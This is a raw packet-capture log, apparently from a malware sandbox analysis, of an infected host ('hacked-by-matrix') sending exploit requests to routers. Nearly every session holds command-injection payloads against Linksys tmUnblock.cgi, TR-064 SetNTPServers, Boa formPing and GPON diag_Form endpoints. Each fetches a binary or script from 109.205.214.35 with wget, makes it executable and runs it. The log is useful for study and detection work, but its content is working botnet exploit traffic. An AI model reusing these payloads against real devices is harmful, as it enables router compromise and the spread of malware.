                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        316192.168.2.1342002194.63.250.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.990772963 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:09.183778048 CET1156INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 994
                                                        Date: Thu, 21 Mar 2024 04:18:43 GMT
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/6.0.18 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /tmUnblock.cgi</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/tmUnblock.cgi</u></p><p><b>description</b> <u>The requested resource (/tmUnblock.cgi) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.18</h3></body></html>
                                                        Mar 21, 2024 05:22:09.788276911 CET1156INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 994
                                                        Date: Thu, 21 Mar 2024 04:18:43 GMT
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/6.0.18 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /tmUnblock.cgi</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/tmUnblock.cgi</u></p><p><b>description</b> <u>The requested resource (/tmUnblock.cgi) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.18</h3></body></html>
                                                        Mar 21, 2024 05:22:11.034504890 CET1156INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 994
                                                        Date: Thu, 21 Mar 2024 04:18:43 GMT
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/6.0.18 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /tmUnblock.cgi</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/tmUnblock.cgi</u></p><p><b>description</b> <u>The requested resource (/tmUnblock.cgi) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.18</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        317192.168.2.1341648172.245.25.12555555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:09.597383976 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:09.700587034 CET413INHTTP/1.0 407 Proxy Authentication Required
                                                        Proxy-Authenticate: Basic realm="login"
                                                        Connection: close
                                                        Content-type: text/html; charset=utf-8
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        318192.168.2.134613674.135.184.897547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:09.619263887 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:10.318265915 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        319192.168.2.1358038172.65.98.11555555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:09.687144995 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        320192.168.2.134618274.135.184.897547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:10.760040045 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        321192.168.2.1356548181.49.14.301723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.036864996 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        322192.168.2.133807042.77.202.132443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496382952 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
